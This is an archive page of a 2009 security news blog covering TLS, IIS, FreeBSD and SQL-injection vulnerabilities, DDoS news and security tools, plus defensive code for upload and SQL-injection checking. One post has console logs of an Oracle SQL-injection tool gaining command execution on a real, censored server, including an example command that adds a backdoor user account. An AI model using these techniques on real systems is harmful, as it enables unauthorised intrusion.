Friday, December 25, 2009

TLS Renegotiation Vulnerability-Proof of Concept Code

Information about a vulnerability in the TLS protocol was published in the beginning of November 2009. Attackers can take advantage of that vulnerability to inject arbitrary prefixes into a network connection protected by TLS. This can result in severe vulnerabilities, depending on the application layer protocol used over TLS.

RedTeam Pentesting used the Python module TLS Lite to develop proof of concept code that exploits this vulnerability. It is published here to raise awareness of the vulnerability and its potential impact. Furthermore, it shall give interested persons the opportunity to analyse applications employing TLS for further vulnerabilities.

For further details, see here.

For the PoC exploit, please click here.

Thursday, December 24, 2009

Microsoft IIS File Parsing Extension Vulnerability

A vulnerability has been identified in Microsoft Internet Information Services (IIS) where the server incorrectly handles files with multiple extensions separated by the ";" character, such as "malicious.asp;.jpg", as ASP files. This could allow attackers to upload malicious executables to a vulnerable web server, bypassing file extension protections and restrictions. This vulnerability does not work with ASP.Net.

Finding Date: April 2008
Report Date: Dec. 2009
Found by: Soroush Dalili (Irsdl {4t] yahoo [d0t} com)
Website: Soroush.SecProject.com
Weblog: Soroush.SecProject.com/blog/
Thanks From: Mr. Ali Abbas Nejad, Mormoroth, Aria‐Security Team, and other ethical hackers.

Vulnerability/Risk Description:
IIS can execute any extension as an Active Server Page or any other executable extension. For instance, “malicious.asp;.jpg” is executed as an ASP file on the server. Many file uploaders protect the system by checking only the last section of the filename as its extension, and by using this vulnerability an attacker can bypass this protection and upload a dangerous executable file to the server.

Impact Description:
The impact of this vulnerability is absolutely high, as an attacker can bypass file extension protections by using a semi‐colon after an executable extension such as “.asp”, “.cer”, “.asa”, and so on. Many web applications are vulnerable to file uploading attacks because of this weakness of IIS. In a measurement which was performed in summer 2008 on some of the famous web applications, 70 percent of the secure file uploaders were bypassed by using this vulnerability.

Method of Finding:
Simple fuzzer by using ASP language itself.

More Details:
In the case of “malicious.asp;.jpg”, web applications consider it a JPEG file, while IIS considers it an ASP file and passes it to “asp.dll”. This bug does not work with ASP.Net, as the .Net technology cannot recognize “malicious.aspx;.jpg” as a .Net file and shows a “page not found” error.
Besides using semi‐colon, “:” can be used to make an empty file with any arbitrary extension. For example by uploading “test.asp:.jpg”, an empty ASP file ‐ “test.asp” ‐ would be created on the server on an NTFS partition. This is only because of “NTFS Alternate Data Streams” and it is completely different from the semi‐colon vulnerability.
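As an added illustration (not code from the advisory), the check below contrasts a naive "last extension only" validator, the kind the advisory says “malicious.asp;.jpg” bypasses, with a hardened one that rejects ';' and ':' outright, inspects every dot-separated segment and stores the file under a server-chosen name. The extension sets and sample file names are assumptions for this example.

```python
"""Validating uploaded file names against the IIS ';' and NTFS ':' tricks.

Added example, not part of the original advisory. The naive check trusts
whatever follows the final '.', which is exactly what "malicious.asp;.jpg"
abuses. The hardened check never lets the user-supplied string reach the
file system at all.
"""
import posixpath
import re
from typing import Optional

# Extensions the advisory names as executed by IIS; extend for your own server.
EXECUTABLE_EXTENSIONS = {"asp", "asa", "cer"}
# Assumed allow-list for an image uploader.
ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}


def naive_is_allowed(filename: str) -> bool:
    """Weak check: looks only at the text after the last '.'."""
    if "." not in filename:
        return False
    return filename.rsplit(".", 1)[1].lower() in ALLOWED_IMAGE_EXTENSIONS


def hardened_is_allowed(filename: str) -> bool:
    """Defensive check whose verdict does not depend on how IIS parses the name."""
    # 1. Strip any directory component a client may have sent along.
    name = posixpath.basename(filename.replace("\\", "/"))
    if not name or name in (".", ".."):
        return False
    # 2. Reject ';' (IIS extension handling), ':' (NTFS alternate data
    #    streams) and control characters explicitly.
    if re.search(r"[;:\x00-\x1f\x7f]", name):
        return False
    # 3. Inspect every dot-separated segment, not only the last one.
    segments = name.lower().split(".")
    if len(segments) < 2 or not segments[0]:
        return False
    if any(seg in EXECUTABLE_EXTENSIONS for seg in segments):
        return False
    # 4. The final extension must still be on the allow-list.
    return segments[-1] in ALLOWED_IMAGE_EXTENSIONS


def safe_storage_name(filename: str, token: str) -> Optional[str]:
    """Return a server-chosen name (token + allow-listed extension), or None.

    Storing the upload as <token>.<ext> means the attacker-controlled string
    is used for the allow-list decision only, never as a path on disk.
    """
    if not hardened_is_allowed(filename):
        return None
    if not re.fullmatch(r"[A-Za-z0-9]+", token):
        raise ValueError("token must be alphanumeric")
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{token}.{ext}"


if __name__ == "__main__":
    # Constructed sample names, including the two forms from the advisory.
    for sample in ("holiday.jpg", "malicious.asp;.jpg", "test.asp:.jpg", "shell.asp.jpg"):
        print(f"{sample:22} naive={naive_is_allowed(sample)!s:5} "
              f"hardened={hardened_is_allowed(sample)}")
```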


More details about this vulnerability here.

DDoS attack scrooges Amazon and others

Service to Amazon, Wal-Mart and several other shopping sites was briefly blocked on Wednesday evening when their DNS provider was hit by a distributed denial of service (DDoS) attack.

Neustar, which provides DNS services to high profile website addresses under the UltraDNS brand, said the flood of malicious traffic, just two days before Christmas, was directed at the company's facilities in San Jose and Palo Alto, and that the effects were mostly limited to California users.

The websites were only down for about an hour — but needless to say at a very inopportune time for some. Neustar said that it first detected the trouble around 4:45 p.m. Pacific Time (12:45 AM Thursday, GMT).

Folks attempting last-minute shopping at Amazon, Wal-Mart, the Gap, and the travel site Expedia were ankled by outages and slow web browsing as a result of the DDoS attack. Other websites impacted include Salesforce.com and Linden Labs (maker of the game Second Life). In a message posted on Twitter, Jeff Barr of Amazon Web Services wrote that the retailer's outages were mostly in the US West Coast, and took down S3 and EC2 — as well as Amazon.com in "many places."

"We analyzed the patterns and were able to put mitigation measures in place within minutes of identifying the attack," NeuStar said in an emailed statement. "We had everything under control in well under an hour. The attack was limited to Northern California internet users. All along the way we were proactively communicating to our customers to let them know exactly what was happening and the steps we were taking."

This isn't the first time UltraDNS and its clients have been downed by DDoS attacks. In April, a larger DDoS attack took Amazon, SalesForce, Oracle and Juniper offline for several hours. Although more limited, Wednesday's malicious torrent of web traffic will insure that someone gets coal in their stocking. ®

This article is taken from http://www.theregister.co.uk/2009/12/24/ddos_attack_ultradns_december_09/

Sunday, December 20, 2009

Twitter investigates DNS hijack

Twitter, the popular micro-blogging network, welcomed visitors on Thursday night with a page claiming that the site had been hacked by defacers with links to Iran.

In reality, the company's domain name had been hijacked by the vandals and visitors redirected to an unrelated site hosting the page. Passive domain-name service (DNS) records showed the DNS poisoning, as Twitter's record pointed first to two domains registered in Moldova and then to a domain registered to an undisclosed person in Pompano Beach, Florida, according to information posted by the SANS Internet Storm Center.

Twitter acknowledged the issue late last night, following earlier media reports.

"Twitter’s DNS records were temporarily compromised but have now been fixed," the site administrators wrote at 11:28 p.m. PT. "We are looking into the underlying cause and will update with more information soon."

The popularity of the social networking service has made it a target of hackers and a focus of security researchers this year. In August, a botnet targeted both Twitter and Facebook with a distributed denial-of-service attack. The micro-blogging service has also had to contend with the spreading of worms, the exploitation of a security vulnerability, and the use of its network as a command-and-control channel.

Thursday's defacement claimed to be done by the "Iranian Cyber Army," but another message -- translated from Farsi by Google's automated translation engine -- reportedly claimed the attack was motivated by the U.S. and Twitter's interference in "my country," suggesting the attacker was an individual.

From: SecurityFocus

Friday, December 04, 2009

Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus

This subject has been covered before, but why not once more? Metasploit 3.3 adds some new options, and better Windows support. As stated in the title, this video will cover using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus. I will also talk a little about using CWSandbox and VirusTotal to examine malware.

If you find this video useful, consider going to the Metasploit Unleashed page and donating to the Hackers For Charity Kenya food for work program, or come to the IndySec charity event.

By the way, I've put out two versions of this video, one an SWF and the other a streaming video. Please let me know which you prefer.

To see this video, please refer to this link:
http://www.irongeek.com/i.php?page=videos%2Fmsfpayload-msfencoder-metasploit-3-3

GreenSQL- Free database firewall protects PostgreSQL and MySQL

GreenSQL is an open source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy for SQL commands and has built-in support for MySQL and PostgreSQL. The logic is based on evaluation of SQL commands using a risk scoring matrix as well as blocking known database administrative commands (DROP, CREATE, etc.). GreenSQL is distributed under the GPL license.

You can download it here.

GreenSQL works as a reverse proxy for MySQL connections. This means that instead of connecting to the MySQL server, your applications connect to the GreenSQL server. GreenSQL analyzes the SQL queries and, if they are safe, forwards them to the back-end MySQL server.

The following picture describes the whole process:


As you can see, GreenSQL calls the real database server to execute SQL commands and the web application connects to the GreenSQL server as if it were a real database server.

GreenSQL can be installed together with the database server on the same computer or it can use a distinct server. By default GreenSQL listens on local port 127.0.0.1:3305 redirecting SQL requests to 127.0.0.1:3306 (the default MySQL setting). These settings can be altered using the GreenSQL Console.
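To make the "risk scoring plus blocked administrative commands" idea concrete, here is an added, illustrative scorer; it is not GreenSQL's own code or matrix, and the patterns, weights, threshold and sample queries are all assumptions for this example.

```python
"""A GreenSQL-style risk scorer for SQL statements (illustrative only).

Mirrors the two mechanisms described above: known administrative commands
are blocked outright, and everything else is scored against weighted
patterns and blocked once the score reaches a threshold. Not GreenSQL's
implementation; weights and threshold are assumed values.
"""
import re
from typing import Dict, List, Tuple

# Statements a web application's database account should never send through the proxy.
ADMIN_COMMANDS = {"DROP", "CREATE", "ALTER", "TRUNCATE", "GRANT", "REVOKE", "SHUTDOWN"}

# (description, pattern, weight) -- assumed weights, tuned for this demo only.
RISK_RULES = [
    ("always-true comparison", re.compile(r"\b(\d+)\s*=\s*\1\b|'([^']*)'\s*=\s*'\2'"), 30),
    ("OR followed by a comparison", re.compile(r"\bOR\b\s+\S+\s*=", re.I), 20),
    ("comment sequence (query truncation)", re.compile(r"--|#|/\*"), 25),
    ("UNION SELECT (data extraction)", re.compile(r"\bUNION\b\s+(?:ALL\s+)?SELECT\b", re.I), 40),
    ("stacked statement", re.compile(r";\s*\S"), 30),
    ("catalog/system table access",
     re.compile(r"\binformation_schema\b|\bpg_catalog\b|\bmysql\.user\b", re.I), 35),
    ("time-delay function", re.compile(r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(", re.I), 35),
    ("character probing function (blind extraction)",
     re.compile(r"\b(?:SUBSTRING|SUBSTR|ASCII|MID)\s*\(", re.I), 25),
    ("system information function",
     re.compile(r"\b(?:USER|VERSION|DATABASE|CURRENT_USER|SYSTEM_USER)\s*\(\s*\)", re.I), 20),
]
BLOCK_THRESHOLD = 40  # assumed


def split_statements(query: str) -> List[str]:
    """Naive split on ';'. Semicolons inside string literals are not handled,
    which is acceptable here because a literal ';' is already scored above."""
    return [s.strip() for s in query.split(";") if s.strip()]


def first_keyword(statement: str) -> str:
    m = re.match(r"\s*([A-Za-z]+)", statement)
    return m.group(1).upper() if m else ""


def score_query(query: str) -> Tuple[int, List[str]]:
    """Sum the weights of every rule that fires and report why."""
    score, reasons = 0, []
    for description, pattern, weight in RISK_RULES:
        if pattern.search(query):
            score += weight
            reasons.append(f"{description} (+{weight})")
    return score, reasons


def decide(query: str) -> Dict[str, object]:
    """Return the proxy's verdict ('block' or 'pass') with score and reasons."""
    for stmt in split_statements(query):
        kw = first_keyword(stmt)
        if kw in ADMIN_COMMANDS:
            return {"action": "block", "score": 100,
                    "reasons": [f"administrative command {kw}"]}
    score, reasons = score_query(query)
    action = "block" if score >= BLOCK_THRESHOLD else "pass"
    return {"action": action, "score": score, "reasons": reasons}


if __name__ == "__main__":
    # Constructed sample traffic as a proxy would see it.
    for q in (
        "SELECT name, price FROM products WHERE id = 42",
        "SELECT name FROM products WHERE id = 42 OR 1=1 -- ",
        "DROP TABLE products",
        "SELECT 1; DROP TABLE products",
        "SELECT name FROM products WHERE id = 42 AND SUBSTRING(user(),1,1)='r'",
    ):
        verdict = decide(q)
        print(f"{verdict['action']:5} {verdict['score']:3}  {q}")
```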

For more details, please refer to GreenSQL website:
http://www.greensql.net/about

FreeBSD 8.0/7.1 local root issue

There is a new local root bug in FreeBSD. This bug was discovered and exploited by Nikolaos Rangos, also known as Kingcope. There is an unbelievably simple local r00t bug in recent FreeBSD versions.

The bug resides in the Run-Time Link-Editor (rtld). Normally rtld does not allow dangerous environment variables like LD_PRELOAD to be set when executing setugid binaries like "ping" or "su". With a rather simple technique rtld can be tricked into accepting LD variables even on setugid binaries.

Please read this advisory for more details:
http://securityreason.com/securityalert/6799

Tuesday, December 01, 2009

FreeBSD 8.0-RELEASE

The FreeBSD Release Engineering Team is pleased to announce the availability of FreeBSD 8.0-RELEASE. This release starts off the new 8-STABLE branch which improves on the functionality of FreeBSD 7.X and introduces many new features. Some of the highlights:
-Xen Dom-U, VirtualBox guest and host, hierarchical jails.
-NFSv3 GSSAPI support, experimental NFSv4 client and server.
-802.11s D3.03 wireless mesh networking and Virtual Access Point support.
-ZFS is no longer in experimental status.
-Ground-up rewrite of USB, including USB target support.
-Continued SMP scalability improvements in many areas, especially VFS.
-Revised network link layer subsystem.
-Experimental MIPS architecture support.

Please read here for more details:
http://www.freebsd.org/releases/8.0R/announce.html

Sunday, November 29, 2009

Multi Purpose Oracle SQL Injection Tool with darkORASQLi.py

After successfully developing a PostgreSQL injection tool, darkc0de will release a new tool for Oracle SQL injection. If you have ever heard of darkMYSQLi, darkMSSQLi or darkPGSQLi, I think this tool will be useful for you, especially penetration testers and security consultants. This tool is 80% working and will be released later.


angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[somevulnsite]/detail.jsp?id=1001039735'" --pwn
|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[somevulnsite]/detail.jsp?id=1001039735'
[+] 10:47:52
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored].WORLD
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command
[+] Sending our ^EVIL^ payloads:

[+] Stage 1: Creating Java Library [ OK ]
[+] Stage 2: Granting Java Execute Privileges [ OK ]
[+] Stage 3: Creating Function for Command Execution [ OK ]
[+] Stage 3: Making Function Executable by All Users [ OK ]

[+] If all OK you should now can exec command with --cmd option
[+] Example:

[+] Windows
[+] --cmd "cmd.exe /c net user d3ck4 d4rkc0d3rz /add"

[+] UNIX/Linux
[+] --cmd "/bin/uname -a"




--cmd "/bin/uname -a"

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/bin/uname -a"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:46:54
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /bin/uname -a
Linux asahan 2.6.9-22.ELsmp #1 SMP Mon Sep 19 18:00:54 EDT 2005 x86_64 x86_64 x86_64 GNU/Linux

[-] 10:46:55
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log




--cmd "/sbin/ifconfig"


angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/sbin/ifconfig"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:33:57
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DC
inet addr:10.100.88.31 Bcast:10.100.88.255 Mask:255.255.255.0
inet6 addr: 2001:e68:2000:6458:211:25ff:fec4:dddc/64 Scope:Global
inet6 addr: fe80::211:25ff:fec4:dddc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:351166911 errors:0 dropped:0 overruns:0 frame:0
TX packets:393842969 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:63516816827 (59.1 GiB) TX bytes:231324821682 (215.4 GiB)
Interrupt:201

eth1 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DD
inet6 addr: fe80::211:25ff:fec4:dddd/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:209

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:948943 errors:0 dropped:0 overruns:0 frame:0
TX packets:948943 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:93467115 (89.1 MiB) TX bytes:93467115 (89.1 MiB)

[-] 10:34:04
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log

20% to go.. till then, keep r0x darkc0de!

Strong Password

To protect your computer, your data and your online accounts, you should have a strong password. If your password is weak, you make it easier for someone to break in. Hackers make their livelihood by automating ways to continually search out the weakest link to gain access to a network or computer.

Please read these links for password security awareness:
http://www.microsoft.com/protect/fraud/passwords/create.aspx
http://www.utexas.edu/its/secure/articles/keep_safe_with_strong_passwords.php

To check the strength of your password, you can use Password Checker:
http://www.microsoft.com/protect/fraud/passwords/checker.aspx

Symantec Online Store Hacked

A self-proclaimed grey-hat hacker has located a critical SQL injection vulnerability in a website belonging to security giant Symantec. The flaw can be leveraged to extract a wealth of information from the database including customer and admin login credentials, product serial numbers, and possibly credit card information.

The flaw was found by a Romanian hacker going by the online handle of Unu, according to whom an insecure parameter of a script on the pcd.symantec.com website allows a blind SQL injection (SQLi) attack to be performed. In such an attack, the hacker obtains read and/or write permission to the underlying database of the vulnerable website.

During a regular SQLi attack, the result of a rogue SQL query is displayed inside the browser instead of the normal web page output. Meanwhile, in a blind SQL injection, the query executes, but the website continues to display normally, making it much more difficult to extract information.

Please read here for more details:
http://news.softpedia.com/news/Symantec-Online-Store-Hacked-127726.shtml

Friday, November 13, 2009

Opinion: Can the SSL vulnerability hurt you?

ComputerWorld Security:

The security blogosphere is agog over some recently published vulnerability information describing attacks against the venerable SSL protocol -- you know, the one that almost the entire Internet relies on for securing transactions as they transit the Net. But how does this impact you? Let's try to separate the wheat from the chaff.

Let's start by looking at the vulnerability itself. It is a "man-in-the-middle" (MitM) attack in which an attacker can use an SSL feature called "negotiation" to inject bad stuff into an SSL session. Right, so that's not good news. But the sky isn't exactly falling yet, so we can all remain calm for now. Let's put things into perspective here.

Yes, by all accounts, there seems to be a serious weakness in SSL. As of right now, however, that weakness is known to a relatively small collection of folks who are working to come up with some solutions to the problem. That said, the technical details of the problem have been published, and there's little doubt that attacks will begin to surface over time.

More info, please read here.

Windows 7 / Server 2008R2 Remote Kernel Crash

This bug is a real proof that SDL #FAIL
The bug triggers an infinite loop on smb{1,2}, pre-auth, no credential needed...
Can be triggered outside the LAN via (IE*)
The bug is so noob, it should have been spotted 2 years ago by the SDL if the SDL had ever existed:
See: http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html

Saturday, November 07, 2009

Facebook and Myspace bolt Flash backdoors

Web developer Yvo Schaap has discovered that Facebook and Myspace have been overgenerous in assigning privileges to Flash applications, allowing Schaap's Flash application to access another user's entire Facebook data.

Flash applications are normally only able to access resources on the server from which they have been loaded. In order to allow developers to design applications with more flexibility, Adobe has, however, introduced the option of explicitly granting access to other servers. This is achieved by means of the crossdomain.xml file in a web server's root folder. Facebook had used this to grant the right to access the main domain to trusted sites via instructions such as:

More information:
http://www.h-online.com/security/news/item/Facebook-and-Myspace-bolt-Flash-backdoors-852318.html
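As an added example (not Facebook's or Myspace's actual policy, and not code from the article), the script below audits a crossdomain.xml file for the kind of over-broad grant described above. Both sample policies are constructed; the element and attribute names follow Adobe's cross-domain policy file format.

```python
"""Audit a crossdomain.xml policy for over-broad Flash access grants.

Added, illustrative code. In Adobe's format, <allow-access-from domain="..."
secure="..."/> lets Flash content loaded from that origin read responses
from this host with the user's cookies, and <site-control> decides whether
policy files elsewhere on the host are honoured at all.
"""
import xml.etree.ElementTree as ET
from typing import List

# Constructed: the kind of grant that lets any site's Flash app read a user's data.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

# Constructed: only named hosts, only over HTTPS, and no subordinate policy files.
RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="static.example.com" secure="true"/>
  <allow-access-from domain="cdn.example.com" secure="true"/>
</cross-domain-policy>"""


def audit_policy(xml_text: str) -> List[str]:
    """Return a list of findings; an empty list means no over-broad grant was seen."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [f"unexpected root element <{root.tag}>"]
    findings: List[str] = []

    # Without master-only, a policy file served from any user-uploadable path
    # on the host could grant access on its own (assumed audit strictness).
    site_control = root.find("site-control")
    permitted = (site_control.get("permitted-cross-domain-policies")
                 if site_control is not None else None)
    if permitted not in ("master-only", "none"):
        findings.append("site-control does not limit policy files to master-only")

    for grant in root.findall("allow-access-from"):
        domain = grant.get("domain", "")
        secure = grant.get("secure", "true").lower()  # Adobe's default over HTTPS
        if domain == "*":
            findings.append('allow-access-from domain="*": every origin may read '
                            "authenticated responses from this host")
        elif domain.startswith("*."):
            findings.append(f"wildcard grant {domain}: every subdomain is trusted, "
                            "including any that host user-supplied content")
        if secure == "false":
            findings.append(f'secure="false" on {domain or "(empty)"}: plain-HTTP '
                            "origins are trusted too")

    for hdr in root.findall("allow-http-request-headers-from"):
        if hdr.get("domain") == "*" or hdr.get("headers") == "*":
            findings.append("allow-http-request-headers-from with a wildcard: "
                            "arbitrary origins may send arbitrary headers")
    return findings


def is_safe(xml_text: str) -> bool:
    return not audit_policy(xml_text)


if __name__ == "__main__":
    for label, policy in (("permissive", PERMISSIVE_POLICY), ("restricted", RESTRICTED_POLICY)):
        print(f"[{label}] findings: {audit_policy(policy) or 'none'}")
```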

Saturday, October 31, 2009

Wapiti -Web application vulnerability scanner

Wapiti allows you to audit the security of your web applications.
It performs "black-box" scans, i.e. it does not study the source code of the application but scans the web pages of the deployed web application, looking for scripts and forms where it can inject data.
Once it gets this list, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.

Wapiti can detect the following vulnerabilities :

* File Handling Errors (Local and remote include/require, fopen, readfile...)
* Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
* XSS (Cross Site Scripting) Injection
* LDAP Injection
* Command Execution detection (eval(), system(), passthru()...)
* CRLF Injection (HTTP Response Splitting, session fixation...)

Wapiti is able to differentiate reflected (non-permanent) and permanent XSS vulnerabilities.
Wapiti prints a warning every time it finds a script allowing HTTP uploads.
A warning is also issued when an HTTP 500 code is returned (useful for ASP/IIS).
Wapiti does not rely on a vulnerability database as Nikto does. Wapiti aims to discover unknown vulnerabilities in web applications.
It does not provide a GUI for the moment and you must use it from a terminal.

You can download here:
http://sourceforge.net/projects/wapiti/

Small, medium firms cut security budgets

Small and medium businesses have, for the most part, frozen spending on security, despite an increase in perceived threats, according to a survey released this week by security firm McAfee.

The report, McAfee's first study of the small- and medium-sized business market, analyzes surveys from approximately 100 companies in each of nine different countries, focusing on firms with 51 to 1,000 employees. The surveys found that three-quarters of firms decided to cut or freeze their spending on information security in 2009, and two-thirds of companies spent less than three hours a week on security.

Read more at SecurityFocus

Saturday, October 24, 2009

FTK 3.0 Forensic Toolkit

FTK 3.0 delivers on a number of advanced capabilities, including greatly enhanced analytics, remote device acquisition and expanded reporting options. GUI speeds and processing time have also been dramatically improved.

Reengineered for Improved Performance:
* UI Performance: The FTK GUI is 10 times more responsive across the board, even on machines with only 4GB of RAM.
* Indexing: Indexes quickly and search results populate fast, even with large result sets.
* Distributed Processing: Every copy of FTK 3 comes with 4 workers, allowing you to leverage CPU resources from up to 4 computers (3 distributed workers and 1 worker on the main FTK examiner system).

Compelling New Capabilities:
* RAM Analysis: Enumerate all running processes from 32-bit machines, search memory strings, and process RAM captures for passwords, html pages, lnk files and MS Office documents.
* Mac Analysis: Many new capabilities, such as processing B-Trees attributes for metadata, decrypting Sparse Images or Sparse Bundles, PLIST support, SQLite support and more.
* Pornographic Image Identification: Enables the automated detection and identification of pornographic images by analyzing visual features in the image to assess its actual visual content.

Friday, October 09, 2009

Installing httpry in Backtrack 4

httpry is a specialized packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but to capture, parse, and log the traffic for later analysis. It can be run in real-time displaying the traffic as it is parsed, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adaptable to different applications.

What can you do with it? Here's a few ideas:
* See what users on your network are requesting online
* Check for proper server configuration (or improper, as the case may be)
* Research patterns in HTTP usage
* Watch for dangerous downloaded files
* Verify the enforcement of HTTP policy on your network
* Extract HTTP statistics out of saved capture files
* It's just plain fun to watch in realtime


Download httpry from this site:
root@zaha-desktop:~# wget http://dumpsterventures.com/jason/httpry/httpry-0.1.5.tar.gz
--2009-10-09 22:45:48-- http://dumpsterventures.com/jason/httpry/httpry-0.1.5.tar.gz
Resolving dumpsterventures.com... 198.107.5.17
Connecting to dumpsterventures.com|198.107.5.17|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44995 (44K) [application/x-tgz]
Saving to: `httpry-0.1.5.tar.gz'

100%[===================================================>] 44,995 39.3K/s in 1.1s

2009-10-09 22:45:50 (39.3 KB/s) - `httpry-0.1.5.tar.gz' saved [44995/44995]



After downloading, extract it:
root@zaha-desktop:~#
root@zaha-desktop:~# tar -xzvf httpry-0.1.5.tar.gz
httpry-0.1.5/
httpry-0.1.5/format.h
httpry-0.1.5/format.c
httpry-0.1.5/error.h
httpry-0.1.5/utility.c
httpry-0.1.5/Makefile
httpry-0.1.5/build/
httpry-0.1.5/build/httpry.spec
httpry-0.1.5/scripts/
httpry-0.1.5/scripts/parse_log.pl
httpry-0.1.5/scripts/perl-tools
httpry-0.1.5/scripts/plugins/
httpry-0.1.5/scripts/plugins/db_dump.mysql
httpry-0.1.5/scripts/plugins/find_proxies.pm
httpry-0.1.5/scripts/plugins/db_dump.cfg
httpry-0.1.5/scripts/plugins/content_analysis.pm
httpry-0.1.5/scripts/plugins/hostnames.pm
httpry-0.1.5/scripts/plugins/tokenize.pm
httpry-0.1.5/scripts/plugins/search_terms.pm
httpry-0.1.5/scripts/plugins/find_proxies.cfg
httpry-0.1.5/scripts/plugins/log_summary.pm
httpry-0.1.5/scripts/plugins/xml_output.css
httpry-0.1.5/scripts/plugins/hostnames.cfg
httpry-0.1.5/scripts/plugins/xml_output.pm
httpry-0.1.5/scripts/plugins/common_log.pm
httpry-0.1.5/scripts/plugins/xml_output.cfg
httpry-0.1.5/scripts/plugins/db_dump.pm
httpry-0.1.5/scripts/plugins/content_analysis.cfg
httpry-0.1.5/scripts/plugins/tokenize.cfg
httpry-0.1.5/scripts/plugins/search_terms.cfg
httpry-0.1.5/scripts/plugins/common_log.cfg
httpry-0.1.5/scripts/plugins/sample_plugin.pm
httpry-0.1.5/scripts/plugins/log_summary.cfg
httpry-0.1.5/methods.h
httpry-0.1.5/tcp.h
httpry-0.1.5/doc/
httpry-0.1.5/doc/ChangeLog
httpry-0.1.5/doc/method-string
httpry-0.1.5/doc/README
httpry-0.1.5/doc/COPYING
httpry-0.1.5/doc/format-string
httpry-0.1.5/doc/perl-tools
httpry-0.1.5/httpry.c
httpry-0.1.5/rc.httpry
httpry-0.1.5/README
httpry-0.1.5/httpry.1
httpry-0.1.5/config.h
httpry-0.1.5/utility.h
httpry-0.1.5/methods.c
httpry-0.1.5/test/
httpry-0.1.5/test/callgrind
httpry-0.1.5/test/massif
httpry-0.1.5/test/valgrind
httpry-0.1.5/test/format-names
root@zaha-desktop:~# cd httpry-0.1.5
root@zaha-desktop:~/httpry-0.1.5# ls
